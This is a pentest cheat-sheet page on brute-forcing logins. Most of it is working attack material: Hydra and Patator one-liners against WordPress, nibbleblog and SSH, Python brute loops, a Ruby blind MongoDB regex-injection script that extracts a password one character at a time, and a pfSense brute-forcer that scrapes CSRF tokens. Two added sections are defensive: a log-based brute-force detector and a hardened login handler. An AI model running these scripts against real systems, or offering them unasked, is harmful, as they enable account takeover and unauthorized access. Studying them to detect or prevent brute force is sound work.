# Hydra Brutes

## Hydra Brute Force

* If failed login attempts return a distinct **"Invalid Username"** message (different from the wrong-password message)
* We can brute-force based on this error: hydra keys on that failure string in the response
* You could use [Burp](/02-scanning/burp.md) to find the keywords first (if you need it)
* Wordlist (common passwords)
  * /usr/share/dirb/wordlists/common.txt
  * 10k_most_common.txt ..faster than rockyou, but decent!
  * .. SecLists/Passwords/Leaked-Databases/rockyou.txt
  * .. SecLists/Passwords/twitter-banned.txt ..small list of good pws

```
# wordpress/blog  (the failure string follows the last colon in the form spec)
hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"
hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"

# web-form-login
hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

# ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

# -t 64  ..if you want to speed up threads  !!!!
```
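The other side of the hydra and patator one-liners above is what they look like in a web server's access log. This is an added example, not part of the original notes: it parses combined-format log lines and flags any client that sends more than a threshold of POSTs to a login path inside a sliding window. The login path list and the sample log lines are constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Login endpoints taken from the one-liners above (assumed list; extend per application).
LOGIN_PATHS = {"/wp-login.php", "/nibbleblog/admin.php", "/department/login.php", "/db/index.php"}

# Apache/nginx "combined" access-log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?", 1)[0]

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Return {ip: peak count} for clients that send more than `threshold` POSTs
    to a login path inside any `window_s`-second sliding window."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or path not in LOGIN_PATHS:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop POSTs older than the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

# Constructed sample (not real traffic): one normal login from 10.0.0.5, and 10.0.0.9
# fetching the form once then sending 12 POSTs to wp-login.php within 22 seconds.
SAMPLE = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 512',
] + [f'10.0.0.9 - - [01/Jan/2024:10:00:{sec:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 512'
     for sec in range(2, 26, 2)]
```

Run `detect_bruteforce(SAMPLE)` to get `{"10.0.0.9": 12}`; a form-based brute force usually answers 200 on every failure, so the request rate, not the status code, is the signal.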

## Trim your wordlist

* REF: [DictsListsMangling](/05-passwords-ciphers/dicts-lists-mangling.md#trim-a-long-dictionary)
* Example: pull every entry containing 'nibble' and try ONLY those

```
grep -i nibble /opt/.../rockyou.txt > mydict.txt
```

REF: [Fuzzing](/02-scanning/fuzzing.md), [Wordpress](/04-webapps/03-webapp-wordpress.md)

## Patator

* Also: [SSHBrutePatator](/02-scanning/02-enum-finger-and-ssh.md#brute-ssh)

```
patator http_fuzz url="http://10.10.10.43/department/login.php" \
    method=POST body='username=admin&password=FILE0' 0=rockyou.txt \
    follow=1 accept_cookie=1 \
    -x ignore:fgrep='Invalid Password!' \
    -x quit:fgrep='Hi admin'

patator http_fuzz url="https://10.10.10.43/db/index.php" \
    method=POST body='password=FILE0&login=Log+In&proc_login=true' 0=rockyou.txt \
    follow=1 accept_cookie=1 \
    -x ignore:fgrep='Incorrect password.' \
    -x quit:fgrep='test'
```

## Python Brute Force Starter Script

```
sudo apt-get install python
sudo apt-get install python-pip
pip install requests
```

```
import requests as rq
req = rq.get("http://xyz.com/login.php?pass=1234")
print(req.text)
```

## Python Brute Loop:

* REF: [PythonBase64Loop](/05-passwords-ciphers/04-cipher-decrypt.md#python-loop-base64)

```
import requests as rq
for i in range(1300,99999):
    req = rq.get("http://xyz.com/login.php?pass="+str(i))
    if "Wrong pass" in req.text:
        print("Attempt #%d" % i)
    else:
        print("\n\nSuccess!\nPassword: %d" % i)
        break
```
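A defender's counterpart to the numeric loop above and to the "Invalid Username" oracle the Hydra section keys on, added here and not part of the original notes: a login handler that returns the identical result for an unknown user and a wrong password, hashes a dummy credential so unknown users cost the same time, and locks the account after five failures. The user store, salt and lockout values are constructed for the demo.

```python
import hashlib
import hmac
import os
import time

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed demo store (assumed values, not a real application).
_SALT = os.urandom(16)
USERS = {"admin": _hash("correct horse battery staple", _SALT)}
_DUMMY = _hash("not-a-real-user", _SALT)   # compared for unknown users so timing stays even
MAX_ATTEMPTS, LOCK_SECONDS = 5, 900
_failures = {}   # account -> (failed count, time of last failure)

def reset_failures():
    _failures.clear()

def login(user, password, now=None):
    """Return 'ok', 'locked' or 'fail'. Unknown user and wrong password give the
    identical 'fail', so there is no 'Invalid username' string to brute-force against."""
    now = time.time() if now is None else now
    count, last = _failures.get(user, (0, 0.0))
    if count >= MAX_ATTEMPTS and now - last < LOCK_SECONDS:
        return "locked"                           # refused even if the password is right
    candidate = _hash(password, _SALT)            # always computed, even for unknown users
    expected = USERS.get(user, _DUMMY)
    if hmac.compare_digest(expected, candidate) and user in USERS:
        _failures.pop(user, None)
        return "ok"
    _failures[user] = (count + 1, now)
    return "fail"

def simulate_sequential_guess(start=1300, stop=1400):
    """Replay the page's numeric loop against this handler, one guess per second;
    returns (guesses answered 'fail', guesses refused as 'locked')."""
    reset_failures()
    results = [login("admin", str(i), now=float(i)) for i in range(start, stop)]
    return results.count("fail"), results.count("locked")

if __name__ == "__main__":
    print(simulate_sequential_guess())   # (5, 95): the loop is cut off after five tries
```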

## Ruby Brute Loop

* Ruby Script for passwords on [MongoDBInjection](/04-webapps/03-webapp.md#mongodb-injection)
* Test every character to see whether it matches the next position of the password (a blind, character-by-character oracle)

* Goal: recover `5b317d17-3ee3-4865-8605-bb579f58c10a` one character at a time
* Loop every digit: try `a`, `b`, `c`; once `c` matches, try `ca`, `cb`, `cc`, and so on
* Needs the `httparty` module: `sudo gem install httparty`, then `vi expl.rb`

```
require 'httparty'

URL = "mymongo.com"

# Truthy when the result page lists admin, i.e. the injected regex matched the password.
# The space before %26%26 is sent as %20 so the URL parses.
def check?(str)
  resp = HTTParty.get("http://#{URL}/?search=admin'%20%26%26%20this.password.match(/^#{str}/)%00")
  resp.body =~ />admin</
end
# puts check?("5").inspect   # known-yes example
# puts check?("a").inspect   # known-no example

CHARSET = ('a'..'z').to_a + ('0'..'9').to_a + ['-']
password = ""

loop do
  # Find the first character that extends the known prefix (check? already anchors with ^).
  found = CHARSET.find do |c|
    puts "Trying: #{c} for #{password}"
    check?("^#{password + c}.*$")
  end
  break unless found   # no character extends the match: the password is complete
  password += found
  puts password
end
```

Note:

* `^5` ..starts with 5
* `>admin<` ..used this b/c success page had this tag with >< marks
* "5" and "aaa" as yes/no examples

## Brute CSRF Python

* Scrape the page and get the csrf token
* REF: SenseHTB ippsec, [pfsense](/04-webapps/pfsense.md)

```
import re
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)   # silence self-signed cert noise

TARGET = 'http://127.0.0.1/index.php'
USER = 'rohit'
# pfSense embeds the token in the page as: var csrfMagicToken = "sid:...";
re_csrf = r'csrfMagicToken = "(.*?)"'

s = requests.session()
with open('passwords.txt') as lines:
    for password in lines:
        password = password.rstrip('\n')
        r = s.post(TARGET)                        # load the login page to get a fresh token
        csrf = re.findall(re_csrf, r.text)[0]
        login = {'__csrf_magic': csrf, 'usernamefld': USER, 'passwordfld': password, 'login': 'login'}
        r = s.post(TARGET, data=login)
        if 'Dashboard' in r.text:
            print("Valid Login %s:%s" % (USER, password))
        else:
            print("Failed")
            s.cookies.clear()
# print(r.text)
# print(csrf)
```

execute:

```
python3 bf-pf.py
```


